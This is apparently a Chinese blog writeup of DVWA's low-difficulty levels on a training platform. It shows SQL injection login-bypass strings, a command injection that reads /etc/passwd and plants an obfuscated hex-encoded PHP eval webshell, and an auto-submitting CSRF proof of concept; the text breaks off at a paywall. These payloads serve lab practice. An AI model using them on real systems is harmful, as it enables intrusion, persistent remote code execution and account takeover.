谜团靶机writeup - DVWA-低等级靶场通关指南

最新推荐文章于 2025-04-03 22:44:40 发布
原创 最新推荐文章于 2025-04-03 22:44:40 发布 · 2.7k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #谜团靶场 #DVWA

本文详细介绍了DVWA漏洞挑战,包括BruteForce暴力破解、CommandInjection命令注入、CSRF跨站请求伪造、FileInclusion文件包含、FileUpload文件上传、InsecureCAPTCHA验证码、SQLInjection注入攻击、弱SessionID管理及XSS跨站脚本等。通过实战演练,学习者可提升安全意识和防护技巧。

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

谜团靶机平台地址:https://mituan.zone/

注册选择靶机

注册登录之后可以看到有很多靶机,选择本次的目标-DVWA。
在这里插入图片描述
点击开始练习
开始练习
点击打开按钮
在这里插入图片描述
在新打开的页面中输入admin password登录,进行靶场初始化。
在这里插入图片描述
初始化完成之后,重新登录,开始靶场练习。。。

Brute Force

输入admin、admin之后抓包,发送到爆破模块,添加字典然后进行暴力破解,成功得到密码password。
在这里插入图片描述
经过查看源码,发现也可以通过注入的方式登录,

  • admin' and 1=1 -- qwe or不行
  • admin' or '1'='1 and不行
  • admin'#
    在这里插入图片描述

Command Injection

输入127.0.0.1 | cat /etc/passwd或者| echo '<?php $a="6576616c28245f52455"."1554553545b385d293b";$b="a";define("a",PACK("H*",$$b));eval(a);?>' > ../../mituan.php,之后访问地址http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/mituan.php?8=phpinfo();
在这里插入图片描述

CSRF

点击Change之后,用Burp抓包,然后制作CSRF Poc。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id='a' action="http://b20b47d25e6e4146a001ba46fd059ea4.app.mituan.zone/vulnerabilities/csrf/">
      <input type="hidden" name="password&#95;new" value="admin123" />
      <input type="hidden" name="password&#95;conf" value="admin123" />
      <input type="hidden" name="Change" value="Change" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
<script>
    function abc(){
        document.getElementById('a').submit();
    }
    setTimeout(abc, 500);
</script>
</html>

最低0.47元/天 解锁文章
实战ATT&CK攻击链路--靶场Writeup(二)
Ms08067安全实验室
11-01 616
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在...
谜团靶机writeup - DVWA-等级靶场通关指南
小龙人
01-07 1179
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA等级靶场。 Brute Force 跟初级相比进行了mysqli_real_escape_string的过滤,因此无法注入,只能暴力了。 发现payload.
DVWA-Writeup
Yukikaze_cxy
05-30 614
待补完。。。SQL Injection目标:获取5个用户的用户名和密码=====【Low】思路:1正常,1'报错,根据错误提示发现服务器未过滤单引号,构造1' union select '1,提示列数不等,继续构造1' union select '1','2发现返回正常,若仍不对则继续构造'3','4'...直至正确返回。由于此题返回所有结果,故直接union select 1,table_nam...
谜团靶机writeup - DVWA-等级靶场通关指南
小龙人
01-10 1347
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA等级靶场。 Brute Force 抓包后,注意修改token,初始token为Extract请求数据包中的token,线程为1。 Command Inje.
mysql查询重复数据
Sunshine_hj的博客
09-09 838
查询重复字段 SELECT * FROM 表 a WHERE (( SELECT COUNT(*) FROM 表 WHERE 字段= a.字段) > 1 ) ORDER BY 字段DESC 删除重复字段 DELETE FROM 表 WHERE 字段IN ( SELECT 字段 FROM ( SELECT 字段FROM 表GROUP BY 字段HAVING Count(*)> 1 ) a ) ...
谜团靶机writeup - Pikachu靶场通关指南-
小龙人
01-24 3622
pikachu靶场
网络安全 - Web 安全靶场 - DVWA-2.3.zip
10-09
通过DVWA,用户可以手动调整靶机的安全级别,从到高分别为Low、Medium、High和Impossible。每个级别都设计有不同的安全防护措施,渗透难度也随之增加。这为用户提供了一个循序渐进的学习过程,有助于逐步掌握各种...
谜团靶机writeup - 专项 · 文件上传
小龙人
01-09 937
涵盖极广的常见且实用的文件上传漏洞利用技巧,收集了渗透测试和CTF中遇到的各种上传漏洞,涵盖文件上传的所有基本的利用技巧,旨在帮助大家对上传漏洞有一个全面的了解。 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。 谜团靶机平台地址:https://mituan.zone/ 注册选择靶机 注册登录之后可以看到有很多靶机,选择本次的目标-文件上传。 遇到不符合常理的问题可以点清空上传文件试试。 图片马 gif格.
白帽子挖洞—文件包含(File Inclusion )
蚁景网安学院
09-13 658
点击“合天智汇”关注,学习网安干货 0x00 介绍 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就...
Vulnhub-Djinn靶机-Writeup
Vicl1fe的博客
12-03 1400
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/djinn-1,397/ 靶机知识点: arp-scan nmap ftp nc dirsearch 命令执行 python2 input漏洞 主机发现 靶机是ova格式的,可以用Vmware导入,也可以用virtualbox打开。 使用...
DVWA靶场--命令注入 (Command Injection)难度(low)
m0_53623242的博客
02-21 4106
作业准备: 1、kali虚拟机 2、靶机:Jdk环境、搭建DVWA靶场、phpStudy(Apache和MySQL都已配置)、BurpSuite抓包 3、虚拟主机
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 740
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
Write-Up - [渗透测试] jangow靶机渗透测试
weixin_54517170的博客
09-14 459
Write-Up - [渗透测试] jangow靶机渗透测试
CSRF跨站请求伪造——入门篇【DVWA靶场low级别writeup
最新发布
weixin_73870552的博客
04-03 1202
本文将带你实现一次完整的CSRF攻击,内容较为基础。了解cookie;已经安装了DVWA靶场环境(本地的或云的);下载了专业版BurpSuite;1. 模拟一次“正常”的上网行为有一天,我打开了一个银行的网页(我们模拟的银行网站),想要给我的朋友转钱:转完钱后,我又去浏览了其他“好看”的网页:看了一会儿之后,再次回到银行页面查看余额,发现钱没了!!!又刷新了一次好看的页面,再去看银行,钱更少了!!!这是什么情况?2. 分析作为一名网络安全的选手,怎么甘心钱就这么消失了呢?肯定有猫腻。
DVWA靶场第一关Brute Force(low级)
weixin_61178511的博客
01-29 1472
准备工作:1.首先我们要进行靶场的搭建 2. 还有一些要用到的工具的安装 3.在浏览器安装代理插件 4.以及打开电脑代理 地址和端口是我相应127.0.0.1和8080 准备工作完毕之后 开始登录,初始账号密码分别为admin和password。 进入后我们先点击DVWA Security将难度调为low级 接下来随便输入账号密码,并打开浏览器的代理,打开Brup Suite的拦截,开始抓包 Raw中弹出如上页面代表抓包成功,我们点击行动将其发送给Intrude...
DVWA 文件包含
m0_73606240的博客
01-08 1124
DVWA File Include
DVWA 靶场
2401_87576048的博客
02-22 1240
输入用户名 密码想要进入数据库点击creat用户名 密码。
谜团XSS靶场1-10关解析
wang649的博客
11-27 1183
谜团XSS靶场1-7关解析 谜团靶场 简介 前两天觉得自己之前写的博客实在是不行,讲的东西都太基础了,都是千篇一律的内容,这方面的内容也比较难讲好,很多细节方面的东西我自己都不会,索性直接删去这部分内容重新开篇,直接进入实战(打靶机),这样在写博客的同时也不会因为写一篇基础性的文章时间太长而导致没有时间去练手,好了废话说到这里,开始打靶。 第一关 首先进到页面,页面什么输入框都没有,但是图片上告诉我们it’s easy 那我们就按照他图片上的走,既然他说了简单,那就直接在URL中进行xss注入 ?name
谜团XSS靶场15-20关解析
wang649的博客
01-23 759
谜团XSS靶场15-20关解析 谜团靶场 第十六关 进到页面查看源代码后发现 参数是keyword,并且参数输出在<center>标签之间。先不急,首先还是尝试有没有过滤掉什么内容”’<script>()alert,on,href,src 随后我们发现只有script被过滤掉了,因此这边我们不能尝试再使用<script>alert(1)</script>的方式进行简单的注入。 这边尝试换一种方式进行注入,既然输出是在标签内部那么我们可以使用<img&
DVWA靶机环境部署与使用指南
DVWA项目旨在作为合法的靶机平台,帮助安全研究人员和爱好者了解各种常见的Web安全漏洞,包括SQL注入、跨站脚本攻击(XSS)、密码破解、文件上传漏洞等,以便他们在安全的环境中进行练习和研究。DVWA设计了不同安全...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值